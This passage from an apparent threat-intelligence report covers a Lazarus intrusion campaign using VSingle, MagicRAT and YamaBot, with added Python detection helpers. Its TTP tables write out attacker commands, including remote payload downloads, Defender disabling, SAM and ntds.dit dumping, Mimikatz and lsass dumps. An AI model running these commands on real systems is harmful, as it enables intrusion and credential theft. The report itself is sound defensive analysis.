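-P, -l, -pw and -i. The sample command is the report's, with constructed values."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Forward:
    kind: str                     # "remote" (-R), "local" (-L) or "dynamic" (-D)
    listen_host: str
    listen_port: int
    target_host: Optional[str]    # None for a SOCKS (-D) forward
    target_port: Optional[int]


def parse_forward(flag: str, spec: str) -> Forward:
    parts = spec.split(":")       # IPv6 literals in brackets are not handled here
    if flag == "-D":
        bind = parts[0] if len(parts) == 2 else "127.0.0.1"
        return Forward("dynamic", bind, int(parts[-1]), None, None)
    if len(parts) == 3:
        bind, (lp, th, tp) = "127.0.0.1", parts
    elif len(parts) == 4:
        bind, lp, th, tp = parts
    else:
        raise ValueError(f"unsupported forward spec: {spec}")
    return Forward("remote" if flag == "-R" else "local", bind, int(lp), th, int(tp))


def is_internal(host: Optional[str]) -> bool:
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False              # hostnames are treated as external until resolved
    return ip.is_private or ip.is_loopback


def analyse(cmdline: str) -> dict:
    tokens = cmdline.split()      # assumes no quoted arguments containing spaces
    forwards: List[Forward] = []
    host = None
    i = 1                         # tokens[0] is the executable
    while i < len(tokens):
        tok = tokens[i]
        if tok in ("-R", "-L", "-D") and i + 1 < len(tokens):
            forwards.append(parse_forward(tok, tokens[i + 1])); i += 2
        elif tok[:2] in ("-R", "-L", "-D") and len(tok) > 2:
            forwards.append(parse_forward(tok[:2], tok[2:])); i += 1
        elif tok in ("-P", "-l", "-pw", "-i"):
            i += 2                # option that takes a value we do not need
        elif tok.startswith("-"):
            i += 1                # flags such as -N or -batch
        else:
            host = tok.split("@")[-1]; i += 1   # [user@]host
    notes: List[str] = []
    for f in forwards:
        if f.kind == "remote":
            notes.append(f"reverse tunnel: {host} listens on {f.listen_host}:{f.listen_port} "
                         f"and relays each connection to {f.target_host}:{f.target_port} on the victim")
            if f.target_host in ("127.0.0.1", "localhost", "::1"):
                notes.append("a loopback-only service on the victim is being exposed to the SSH server")
        elif f.kind == "local":
            notes.append(f"local forward: victim listens on {f.listen_host}:{f.listen_port} and relays "
                         f"via {host} to {f.target_host}:{f.target_port}")
        else:
            notes.append(f"SOCKS proxy: victim listens on {f.listen_host}:{f.listen_port}, traffic exits at {host}")
    if "-N" in tokens:
        notes.append("-N: no remote shell requested, tunnel-only session")
    notes.append(("internal" if is_internal(host) else "external or unresolved") + f" SSH server: {host}")
    return {"ssh_host": host, "forwards": forwards, "notes": notes}


# The report's pvhost.exe (plink) command with constructed credentials and relay host.
SAMPLE_CMD = (r"C:\Windows\system32\config\systemprofile\AppData\Roaming\microsoft\pvhost.exe "
              "-N -R 18118:127.0.0.1:8118 -P 22 -l tunneluser -pw <password> relay.example.invalid")

if __name__ == "__main__":
    for note in analyse(SAMPLE_CMD)["notes"]:
        print("-", note)
```

For the report's command the output states that the external relay host listens on 18118 and relays to 127.0.0.1:8118 on the victim, and flags that a loopback-only service (the 3proxy listener) is being exposed; a reverse forward whose target is loopback, combined with -N, is the tunnel-only profile worth alerting on.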


VSingle RAT Analysis


The VSingle loader executable is an MFC-based backdoor that consists of multiple layers. The first is responsible for decoding and executing the next layer (layer 2), a shellcode in the memory of the implant process. The shellcode is simply an injector for the next layer (layer 3, also shellcode). The implant spawns a new "explorer.exe" process and injects shellcode (layer 3) into it for execution.

Layer 3, once running in the newly spawned benign process (explorer.exe), decodes another layer (layer 4) of shellcode, which is then executed inside that benign process.

Layer 4 is the actual VSingle implant DLL loaded reflectively into the memory of the benign process.




The implant is simple in terms of functionality and is basically a stager that enables the attackers to deploy more malware on the infected system. It also includes the ability to open a reverse shell that connects to the C2 server and gives the attackers unrestricted access to the endpoint to execute commands via "cmd.exe."

Although a rather simple RAT, VSingle can download and execute additional plugins from the C2 server. These plugins can either be in the form of shellcode or script files of specific formats served by the C2. The image below shows the code used to execute downloaded shellcode.


In-memory shellcode execution by the implant.

For simpler cases, the implant can receive executables or scripts, save them into a file in the %temp% directory and execute them on the endpoint. The implant supports .vbs, .bat and .tmp files, all of which are executed through "cmd /c." The .tmp files can also be loaded as executables (.exe).

The implant can achieve persistence for malware artifacts served and specified by the C2 server. The simpler mechanism is the creation of a file in the Startup folders, which is done in two different locations:

c:\Documents and Settings\%s\Start Menu\Programs\Startup\%s
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\


Additionally, the VSingle operators have three other persistence mechanisms available, all of which are invoked through "cmd.exe /c":

Command Intent
sc create "%s" DisplayName= "%s" type= own type= interact start= auto error= ignore binpath= "cmd.exe /k start \"\" \"%s\" Auto start Service Creation [T1543/003]
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "%s" /t REG_SZ /d "%s" /f Run registry key [T1547/001]
schTasks /Create /F /TN "%s" /TR "%s" /SC onlogon Scheduled task triggered at logon [T1053/005]
schtasks /create /tn <task_name> /tr C:\\Windows\\upsvc.exe /sc onstart /ru System /rl highest /f Scheduled task triggered at system start with high priority [T1053/005]
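
All of the rows above are parseable, and the traits that mark them as suspicious (a payload started through cmd.exe, a binary in a user-writable directory, a task running as SYSTEM at highest run level) can be extracted mechanically. The following is an added example, not code from the report, that turns sc create, Run-key and schtasks commands into structured records; the service names and paths are constructed, and it assumes the "cmd.exe /c" wrappers have already been stripped.

```python
"""Turns the persistence commands the report lists (sc create, Run key, schtasks) into
structured records and flags the traits that make them suspicious. Added example, not
Talos code; the sample commands are the report's with constructed names and paths, and
wrappers such as 'cmd.exe /c' are assumed to have been stripped already."""
import re
import shlex
from typing import Dict, List, Optional


def _unq(s: str) -> str:
    return s[1:-1] if len(s) >= 2 and s[0] == s[-1] == '"' else s


def _tokens(cmd: str) -> List[str]:
    # non-POSIX mode keeps Windows backslashes intact and leaves quotes on the token
    return shlex.split(cmd, posix=False)


def command_flags(command: str, runas: Optional[str] = None, level: Optional[str] = None) -> List[str]:
    flags = []
    if re.search(r"\b(cmd|powershell|pwsh|wscript|cscript|mshta)(\.exe)?\b", command, re.I):
        flags.append("payload launched through a command interpreter")
    if re.search(r"\bstart\b", command, re.I):
        flags.append("'start' used to detach the payload from the service/task host")
    if re.search(r"\\(users\\[^\\]+\\appdata|users\\public|programdata|windows\\temp|temp)\\", command, re.I):
        flags.append("payload lives in a user-writable location")
    if runas and runas.lower() in ("system", "nt authority\\system") and (level or "").lower() == "highest":
        flags.append("runs as SYSTEM with highest run level")
    return flags


def classify(cmd: str) -> Optional[Dict]:
    """Structured record for a persistence command, or None if 'cmd' is not one."""
    toks = _tokens(cmd)
    if not toks:
        return None
    exe = re.sub(r"\.exe$", "", toks[0].lower().rsplit("\\", 1)[-1])
    if exe == "sc" and len(toks) > 2 and toks[1].lower() == "create":
        opts: Dict[str, str] = {}
        key = None
        for tok in toks[3:]:
            if tok.endswith("="):                       # sc syntax: 'binpath= value'
                key = tok[:-1].lower()
                opts.setdefault(key, "")
            elif key is not None:                       # repeated keys (type= own type= interact) accumulate
                opts[key] = (opts[key] + " " + _unq(tok)).strip()
        command = opts.get("binpath", "")
        return {"mechanism": "service", "name": _unq(toks[2]), "command": command,
                "trigger": "start=" + opts.get("start", "demand"), "runas": opts.get("obj"),
                "flags": command_flags(command)}
    if exe == "reg" and len(toks) > 2 and toks[1].lower() == "add":
        key = _unq(toks[2]).rstrip("\\").lower()
        if not re.search(r"\\currentversion\\(run|runonce)$", key):
            return None                                 # reg add to something other than an autorun key
        opts = {}
        for i in range(3, len(toks) - 1):
            if toks[i].startswith("/") and not toks[i + 1].startswith("/"):
                opts[toks[i][1:].lower()] = _unq(toks[i + 1])
        command = opts.get("d", "")
        return {"mechanism": "run_key", "name": opts.get("v", "(default)"), "command": command,
                "trigger": "logon (" + toks[2].split("\\")[0].upper() + " Run key)", "runas": None,
                "flags": command_flags(command)}
    if exe == "schtasks" and any(t.lower() == "/create" for t in toks[1:]):
        opts = {}
        i = 1
        while i < len(toks):
            if not toks[i].startswith("/"):
                i += 1
                continue
            name, vals, i = toks[i][1:].lower(), [], i + 1
            while i < len(toks) and not toks[i].startswith("/"):
                vals.append(_unq(toks[i]))
                i += 1
            opts[name] = " ".join(vals)
        command = opts.get("tr", "")
        return {"mechanism": "scheduled_task", "name": opts.get("tn", ""), "command": command,
                "trigger": opts.get("sc", ""), "runas": opts.get("ru"),
                "flags": command_flags(command, opts.get("ru"), opts.get("rl"))}
    return None


# The report's four persistence rows with constructed names/paths, plus a benign-looking baseline.
SAMPLE_COMMANDS = [
    r'sc create "WinUpdSvc" DisplayName= "WinUpdSvc" type= own type= interact start= auto error= ignore binpath= "cmd.exe /k start C:\Users\Public\svhostww.exe"',
    r'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "WinUpd" /t REG_SZ /d "C:\Users\Public\svhostww.exe" /f',
    r'schTasks /Create /F /TN "WinUpd" /TR "C:\Users\Public\svhostww.exe" /SC onlogon',
    r'schtasks /create /tn upsvc /tr C:\Windows\upsvc.exe /sc onstart /ru System /rl highest /f',
    r'sc create VendorAgent binpath= "C:\Program Files\Vendor\agent.exe" start= auto',
]

if __name__ == "__main__":
    for c in SAMPLE_COMMANDS:
        print(classify(c))
```

The escaped inner quotes in the report's sc row (`\"\" \"%s\"`) are not handled by the non-POSIX tokenizer, which is why the sample writes the binpath without them; for logs that preserve the escapes, unescape before tokenizing.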



Victim No. 2: The discovery of MagicRAT


In another victim's network, we saw a similar chain of events: initial recon followed by disabling the AV software and the deployment of a bespoke implant. We also observed successful lateral movement into other endpoints in the enterprise.



What's unique in this intrusion, however, is that we observed the deployment of a fairly new implant three days before the attackers deployed VSingle on the infected systems.

This implant called "MagicRAT" is outlined in a recently published post. The reverse interactive shell eventually downloads MagicRAT from a remote location.


MagicRAT Analysis


In this campaign, MagicRAT was configured with a different configuration file and path. It also reported to different C2 servers. The configuration directory is now called "MagicMon" in the current user's "AppData\Roaming" directory. As seen in the screenshot below, this folder creates and hosts an initialization file named "MagicSystem.ini." This INI file contains several configurations including the list of C2 URLs that can be used by the implant to send and receive commands and data.


INI file containing the list of base64 encoded C2 URLs.
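
Since the INI stores its C2 list base64-encoded, a quick triage step is to decode every value and keep those that turn into URLs. The following is an added example, not the implant's or Talos' code; the section and key names are assumptions about the layout, and the sample file is built from constructed .invalid URLs.

```python
"""Triage helper for configuration files like MagicRAT's MagicSystem.ini, where C2 URLs are
stored base64-encoded: every value in the INI is decoded and kept if it turns into an
http(s) URL. Added example, not Talos code; section and key names below are assumptions
and the file content is constructed (the URLs point at .invalid hosts)."""
import base64
import binascii
import configparser
import re
from typing import List, Optional, Tuple

URL = re.compile(r"^https?://[^\s'\"<>]+$", re.I)


def decode_if_url(value: str) -> Optional[str]:
    """Return the decoded URL if 'value' is base64 text for one, otherwise None."""
    try:
        raw = base64.b64decode(value.strip(), validate=True)   # strict alphabet and padding
        text = raw.decode("ascii")
    except (binascii.Error, ValueError):                       # UnicodeDecodeError is a ValueError
        return None
    return text if URL.match(text) else None


def extract_c2_urls(ini_text: str) -> List[Tuple[str, str, str]]:
    """(section, key, url) for every value that base64-decodes to an http(s) URL."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                       # keep key case as written in the file
    cp.read_string(ini_text)
    found = []
    for section in cp.sections():
        for key, value in cp.items(section):
            url = decode_if_url(value)
            if url:
                found.append((section, key, url))
    return found


# Constructed URLs standing in for the implant's C2 list.
C2_URLS = [
    "http://c2-one.example.invalid/board/view.php",
    "https://c2-two.example.invalid/upload/post.php",
    "http://c2-three.example.invalid/index.php",
]


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Section and key names are assumptions, not the implant's real layout; the other values
# are noise to show that non-URL content is ignored.
SAMPLE_INI = f"""[Config]
Id=7f3a
Interval=60
[URLs]
URL1={_b64(C2_URLS[0])}
URL2={_b64(C2_URLS[1])}
URL3={_b64(C2_URLS[2])}
Note=MagicMon
"""

if __name__ == "__main__":
    for section, key, url in extract_c2_urls(SAMPLE_INI):
        print(f"[{section}] {key} -> {url}")
```

Strict decoding matters here: values such as "MagicMon" are valid base64 alphabet and decode without error, but to non-ASCII bytes, so the ASCII-and-URL check is what separates real indicators from coincidental matches.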


Lateral Movement


During the first few days after the successful initial access, the attackers conducted limited reconnaissance of the endpoint and deployed two different malware families, MagicRAT and VSingle, on the infected endpoint to maintain covert access to the system. Just like with the first victim, the attackers then started to perform Active Directory (AD) related explorations (via impacket and VSingle) to identify potential endpoints to laterally move into. The table below illustrates the commands executed to perform such actions.

Command Intent
powershell.exe Get-NetUser 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 User Discovery [T1033]
powershell.exe Get-ADDomain 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 Account/Domain Discovery [T1087]
powershell.exe Get-ADUser <server> -Properties * 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 User Discovery [T1033]
powershell.exe Get-ADUser -Filter * 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 User Discovery [T1033]
powershell.exe Get-ADGroup -filter * 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 Account/Domain Discovery [T1087]
powershell.exe Get-AdComputer -filter * 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 System Information Discovery [T1082]
powershell.exe Get-ADComputer -filter {OperatingSystem -Like '*Windows 10*'} -property * | select name, operatingsystem System Information Discovery [T1082]
nslookup <remote_computername> Account/Domain Discovery [T1087]
powershell.exe Get-WMIObject -Class win32_operatingsystem -Computername <remote_computername> System Information Discovery [T1082]
powershell.exe Get-ADUser -Filter * | Select SamAccountName User Discovery [T1033]
powershell.exe Get-AdUser -Filter * -Properties * | Select Name, logonCount User Discovery [T1033]
powershell.exe Get-AdComputer -Filter * -Properties * | select Name, LastLogonDate, lastLogon, IPv4Address Account/Domain Discovery [T1087]
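
The `1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1` suffix on these commands is the output-capture wrapper that impacket-style remote execution adds around whatever the operator typed, so it is both a hunting pivot and a way to recover the real command. As an added example (not Talos code), the helper below extracts the inner command, share and log file name from such command lines, including the ^-escaped echo variant that appears in the dsquery table further down; the sample lines and file names are constructed.

```python
r"""Recovers the operator's real command from the '1> \\127.0.0.1\ADMIN$\<file> 2>&1'
wrapper that impacket-style remote execution leaves in process command lines.
Added example, not Talos code; the sample command lines are constructed from the
report's tables (the '__<number>' log file names are invented)."""
import re
from typing import List, Optional

# output redirected to a loopback admin share, plain or with cmd's ^ escaping (echo variant)
REDIRECT = re.compile(
    r"\s+1?\^?>\s*(\\\\127\.0\.0\.1\\([A-Za-z]+\$)\\(\S+))\s*2\^?>\^?&1\s*$", re.I)
WRAPPER = re.compile(r"^\s*cmd(\.exe)?\s+(?:/\w+\s+)*", re.I)


def extract(cmdline: str) -> Optional[dict]:
    """Inner command, share and log file if the artefact is present, else None."""
    m = REDIRECT.search(cmdline)
    if not m:
        return None
    inner = WRAPPER.sub("", cmdline[: m.start()], count=1).strip()
    via_echo = inner.lower().startswith("echo ")
    if via_echo:
        inner = inner[5:].strip()
    return {"command": inner, "share": m.group(2), "log_file": m.group(3), "via_echo": via_echo}


def triage(cmdlines: List[str]) -> List[dict]:
    """Keep only the lines that show the artefact; one record per remotely executed command."""
    return [rec for rec in (extract(c) for c in cmdlines) if rec]


SAMPLE_CMDLINES = [
    r"cmd.exe /Q /c wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName, productState 1> \\127.0.0.1\ADMIN$\__1662621234.56 2>&1",
    r"powershell.exe Get-ADUser -Filter * 1> \\127.0.0.1\ADMIN$\__1662621300.11 2>&1",
    r"cmd.exe /Q /c echo dsquery computer ^> \\127.0.0.1\C$\__1662621400.22 2^>^&1",
    r"cmd.exe /c dir C:\Users > C:\Windows\Temp\listing.txt 2>&1",   # ordinary local redirection, no hit
]

if __name__ == "__main__":
    for rec in triage(SAMPLE_CMDLINES):
        print(rec)
```

A burst of such records on one host, each with a fresh log file name, is the footprint of an interactive remote session rather than a scheduled job; the recovered inner commands can then be matched against the discovery tables above.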


Once the list of computers and users is obtained, the attackers would manually ping specific endpoints in the list to verify if they are reachable (with an occasional tracert). VSingle deployment on new hosts was done by using WMIC to start a remote process. This process was, in fact, a PowerShell snippet that would download VSingle from a remote system [T1608/001].

WMIC /node:<Computer_Name> process call create "powershell.exe (New-Object System.Net.Webclient).DownloadFile('<remote_location>/svhostw.exe','<local_path>\\svhostww.exe')"


In some infections, we observed the deployment of impacket tools on other endpoints to move laterally and establish an interactive shell.

This stage of the attacks was clearly manual work performed by a human operator. While they were trying to establish interactive remote console sessions, we can see the operators making errors in the commands.

Try # Command Result
1 Enter-PSSession <ComputerName> Failed attempt
2 Enter-PSSession Failed attempt
3 powershell.exe Enter-PSSession Correct command


The attackers typically take their time to explore the infected system by obtaining file listings of multiple directories of interest to them. When files of particular interest are found they are put into a .rar archive for exfiltration, typically via one of the custom-developed implants running on the system.


Victim No. 3: VSingle makes way for YamaBot


During one particular intrusion, the attackers first deployed VSingle on the endpoint. However, after the VSingle sample was detected, the attackers were at risk of losing access to the enterprise. Therefore, after repeated failed attempts to deploy VSingle on the endpoints, the attackers then deployed another updated copy of VSingle. After maintaining continued access for a while, the attackers then moved on to the use of another implant — YamaBot.

YamaBot is a custom-made GoLang-based malware family. It uses HTTP to communicate with its C2 servers. It typically begins by sending preliminary system information about the infected endpoint to the C2: computer name, username and MAC address.



YamaBot's helper function names.

This implant has standard RAT capabilities, including the ability to:

  • List files and directories.
  • Send process information to C2.
  • Download files from remote locations.
  • Execute arbitrary commands on the endpoints.
  • Uninstall itself.


YamaBot was recently attributed to the Lazarus APT group by JPCERT who provided an excellent analysis of the implant.


Credential Harvesting


Apart from the usual recon and deployment of the custom implants, we also observed Lazarus' use of completely different TTPs for credential harvesting. The attackers created backups of volumes (shadow copies) that were then used to create a copy of the "ntds.dit" file containing Active Directory data for exfiltration.

Command Intent
vssadmin list shadows /for=C: ^> <local_path>\<log_file> > <local_path>\execute.bat & C:\Windows\system32\cmd.exe /Q /c <local_path>\execute.bat & del <local_path>\execute.bat System Information Discovery [T1082]
vssadmin create shadow /For=C: ^> <local_path>\<log_file> > <local_path>\execute.bat & C:\Windows\system32\cmd.exe /Q /c <local_path>\execute.bat & del <local_path>\execute.bat OS Credential Dumping: NTDS [T1003/003]
cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit <local_path>\phPzFvOU.tmp ^> <local_path>\<log_file> > <local_path>\execute.bat & C:\Windows\system32\cmd.exe /Q /c <local_path>\execute.bat & del <local_path>\execute.bat OS Credential Dumping: NTDS [T1003/003]
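
The table shows the two-step pattern a detection can key on: a shadow-copy creation followed shortly by a copy of ntds.dit (or a registry hive) from a HarddiskVolumeShadowCopy path. The following is an added example, not Talos code, that correlates those two steps per host within a time window; the hosts, users, timestamps and local paths are constructed, with the report's placeholders filled in.

```python
r"""Correlates a shadow-copy creation with a later read of ntds.dit (or the SAM/SECURITY/
SYSTEM hives) from a \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path.
Added example, not Talos code; the events are constructed process-creation records."""
import re
from datetime import datetime, timedelta
from typing import Dict, List

# vssadmin is what the report shows; 'wmic shadowcopy call create' is another built-in route
CREATE = re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow\b|\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bcreate\b", re.I)
ACCESS = re.compile(r'HarddiskVolumeShadowCopy\d+\\.*?\\(ntds\.dit|SAM|SECURITY|SYSTEM)(?=\s|$|")', re.I)


def correlate(events: List[Dict], window_minutes: int = 30) -> List[Dict]:
    """One alert per shadow-copy read of a credential store; create_ts is set when a
    shadow-copy creation preceded it on the same host within the window."""
    alerts = []
    last_create: Dict[str, datetime] = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if CREATE.search(ev["cmdline"]):
            last_create[ev["host"]] = ts          # remember the most recent creation per host
            continue
        m = ACCESS.search(ev["cmdline"])
        if not m:
            continue
        created = last_create.get(ev["host"])
        within = created is not None and ts - created <= timedelta(minutes=window_minutes)
        alerts.append({"host": ev["host"], "user": ev["user"], "target": m.group(1),
                       "access_ts": ev["ts"], "create_ts": created.isoformat() if within else None})
    return alerts


# Constructed events: DC01 reproduces the report's sequence; FS01 is a backup job with no
# follow-up read; DC02 reads a hive 75 minutes after its creation (outside the default window).
SAMPLE_EVENTS = [
    {"ts": "2022-03-02T01:10:00", "host": "DC01", "user": "CORP\\svc_update",
     "cmdline": r"vssadmin list shadows /for=C:"},
    {"ts": "2022-03-02T01:11:00", "host": "DC01", "user": "CORP\\svc_update",
     "cmdline": r"vssadmin create shadow /For=C:"},
    {"ts": "2022-03-02T01:14:00", "host": "DC01", "user": "CORP\\svc_update",
     "cmdline": r"cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Windows\Temp\phPzFvOU.tmp"},
    {"ts": "2022-03-02T02:00:00", "host": "FS01", "user": "CORP\\backupsvc",
     "cmdline": r"vssadmin create shadow /For=D:"},
    {"ts": "2022-03-02T05:00:00", "host": "DC02", "user": "CORP\\svc_update",
     "cmdline": r"vssadmin create shadow /For=C:"},
    {"ts": "2022-03-02T06:15:00", "host": "DC02", "user": "CORP\\svc_update",
     "cmdline": r"cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM C:\Windows\Temp\zsys.tmp"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

A read of ntds.dit or a hive from a shadow copy is alerted on even without a matching creation, since the creation may have happened through another tool or outside the log retention; the correlation only adds confidence and the originating command.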



The Variations in the playbook


The overall structure of the infection chains remained the same across multiple intrusions in this campaign, primarily consisting of the cyber kill chain that we illustrated at the beginning of the campaign section.

However, there were some key variations, consisting of optional activities conducted by the adversary in different intrusion sets. These variations include the use of:

  • Credential harvesting using tools such as Mimikatz and Procdump.
  • Proxy tools to set up SOCKS proxies.
  • Reverse tunneling tools such as PuTTY's plink.


It is therefore necessary to list all the TTPs used by the adversary across all the intrusions we've discovered in this campaign. This section provides an additional list of TTPs and commands used by the operators along with their corresponding MITRE ATT&CK IDs to help defenders better understand this APT's offensive playbook.


Note: There is some overlap between operations (common or similar commands) carried out via the reverse shell, the VSingle RAT and impacket tools. This could be because multiple human operators were manually executing their own sets of commands based on their shift days and timings, without a proper handover of the information collected from one operator to the next.


For example, in one instance, the attackers tried to obtain Active Directory information on one endpoint via PowerShell cmdlets. However, a day later, the attackers used adfind.exe to extract similar information on the same endpoint.

Disabling AV components


The threat actors used multiple variations of commands to query information about the installed antivirus software on the endpoints, followed by disabling the Windows Defender antivirus.

Command Intent
cmd /C wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayname Security Software Discovery [T1518/001]
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /format:list Security Software Discovery [T1518/001]
cmd.exe /Q /c wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName, productState, pathToSignedProductExe 1> \\127.0.0.1\ADMIN$\<log_file_name> 2>&1 Security Software Discovery [T1518/001]
cmd.exe /c powershell -exec bypass -Command Get-MpPreference Security Software Discovery [T1518/001]
powershell.exe -ExecutionPolicy Bypass -command Set-MpPreference -DisableRealtimeMonitoring $true Impair Defenses [T1562/001]
reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection /s /f DisableRealtimeMonitoring Impair Defenses [T1562/001]
powershell -exec bypass -Command Set-MpPreference -SubmitSamplesConsent NeverSend Impair Defenses [T1562/001]
powershell -exec bypass -Command Set-MpPreference -MAPSReporting Disable Impair Defenses [T1562/001]
cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyWare /t REG_DWORD /d 1 Impair Defenses [T1562/001]

Reconnaissance


During the reconnaissance and credential harvesting stage, the attackers gather information about the system, the network — including the domain — and the installed software. Using a WMIC command, the attackers also collect information about the logical drives of the infected systems.

Then, the attackers harvest and exfiltrate credentials. During the reconnaissance stage, the attackers specifically check if the RDP port is open. If it is and the attackers decrypt any of the harvested credentials, they would have direct access to the system without the need to install any other backdoor. The complete list of commands is provided in the table below.

Command Intent
cmd.exe /c ipconfig /all Network discovery [T1590]
cmd.exe /c dir c:"Program Files (x86) Installed software [T1518]
cmd.exe /c dir c:"Program Files Installed software [T1518]
cmd.exe /c systeminfo System Information Discovery [T1082]
cmd /C qwinsta User Discovery [T1033]
cmd /C nslookup Network discovery [T1590]
cmd /C netstat -noa | findstr 3389 Network discovery [T1590]
cmd /C net view /domain Domain discovery [T1087/002]
cmd /C wmic logicaldisk get deviceid, size System Information Discovery [T1082]
cmd.exe /c reg query HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp System Information Discovery [T1082]
cmd.exe /Q /c wevtutil qe Microsoft-Windows-TerminalServices-LocalSessionManager/Operational /c:20 /q:*[System [(EventID=25)]] /rd:true /f:text 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 Query event logs - Get RDP session reconnection information
netsh advfirewall firewall add rule name=allow RemoteDesktop dir=in protocol=TCP localport=3389 action=allow Modify Firewall [T1562/004]
reg.exe add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 3389 /f Configure RDP [T1021/001]

Credential harvesting


In some intrusions, the attackers saved copies of registry hives for subsequent exfiltration, from which credentials and policy information can be extracted offline.

Command Intent
cmd.exe /c reg save hklm\sam <local_path>\zsam.tmp Credential harvesting [T1003]
cmd.exe /c reg save hklm\security <local_path>\zsec.tmp Credential harvesting [T1003]
cmd.exe /c reg save hklm\system <local_path>\zsys.tmp Credential harvesting [T1003]
<local_path>\rar.exe a <local_path>\zzzzz.tmp <local_path>\zs*.tmp Archive Collected Data [T1560]
cmd.exe /c copy /y <local_path>\zzzzz.tmp c:"Program Files\"VMware View\server\broker\webapps\portal\webclient\z.tmp Archive Collected Data [T1560]

Active Directory (AD) Recon


The attackers also typically use a malicious batch (.bat) file called "adfind.bat" to execute adfind.exe on some of the infected endpoints and collect AD information.

Command Intent
cmd.exe /c <local_path>\adfind.bat Remote System Discovery [T1018]
adfind.exe -f (objectcategory=person) Remote System Discovery [T1018]
adfind.exe -f objectcategory=computer Remote System Discovery [T1018]
adfind.exe -f (objectcategory=organizationalUnit) Remote System Discovery [T1018]
adfind.exe -f (objectcategory=group) Remote System Discovery [T1018]
adfind.exe -gcb -sc trustdmp Domain Trust Discovery [T1482]


We also observed the use of dsquery to obtain similar information.

Command Intent
cmd.exe /Q /c echo dsquery computer ^> \\127.0.0.1\C$\<impacket_log_file> 2^>^&1 Domain Account Discovery [T1087/002]
cmd.exe /Q /c echo dsquery group -name GroupName ^> \\127.0.0.1\C$\<impacket_log_file> 2^>^&1 Domain Account Discovery [T1087/002]
cmd.exe /Q /c echo dsquery computer -name ComputerName ^> \\127.0.0.1\C$\<impacket_log_file> 2^>^&1 Domain Account Discovery [T1087/002]
cmd.exe /Q /c echo dsquery user -name UserName ^> \\127.0.0.1\C$\<impacket_log_file>t 2^>^&1 Domain Account Discovery [T1087/002]

Unauthorized account creations


In most instances, the attackers instrumented the reverse shell to create their own user accounts on the endpoints they had initial access to. Similar activity was also seen being conducted via the VSingle implant as it was propagated across an enterprise.

Command Intent
net1 group /domain Domain discovery [T1087/002]
net1 user <username> <password> /domain Create Account [T1136/002]
net1 user <username> /active:yes /domain Create Account [T1136/002]
net1 group <groupname> /add /domain Create Account [T1136/002]
net1 group <groupname> <username> /add /domain Create Account [T1136/002]

Additional tools used

In some cases, the attackers deployed commonly used tools often seen from other threat actors.

Mimikatz


The attackers downloaded the Mimikatz tool from their server inside a password-protected .rar archive, which prevents network intrusion prevention systems from inspecting and detecting the payload in transit.

Command Intent
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://<remote_location>/mi.tmp', '<local_path>\m.tmp') Download Payloads [T1608/001]
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://<remote_location>/mi64.tmp', '<local_path>\mi.tmp') Download Payloads [T1608/001]
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://<remote_location>/mm.rar', '<local_path>\mm.tmp') Download Payloads [T1608/001]
<local_path>\rar.exe e <local_path>\m.tmp <local_path>\ -p<password> Extract files [T1140]
<local_path>\mi.exe privilege::debug sekurlsa::logonPasswords exit OS Credential Dumping [T1003/001]

Procdump


Along with Mimikatz, the attackers also used procdump to dump the LSASS memory to a file on disk.

Command Intent
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://<remote_location>/pd64.tmp', '<local_path>\pd.tmp') Download Payloads [T1608/001]
ren <local_path>\pd.tmp pd64.exe Rename files
<local_path>\pd64.exe -accepteula -ma lsass <local_path>\z_pd.dmp OS Credential Dumping [T1003/001]

Socks proxy


In another instance, the attackers downloaded and set up a SOCKS proxy on the local endpoint, including the use of 3proxy.

Command Intent
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://<remote_location>/spr.tmp', '<local_path>\spr.tmp') Download Payloads [T1608/001]
<local_path>\rar.exe e <local_path>\spr.tmp <local_path_2> -p<password> Extract files [T1140]
<local_path_2>\msconf.exe -i 84[.]38[.]133[.]145 -p <Port_number> Proxy [T1090]

Implant deployment and lateral movement


Across the first endpoints compromised in the enterprises, we observed the attackers downloading their custom implants from remote locations and deploying and persisting them on the systems.

Command Intent
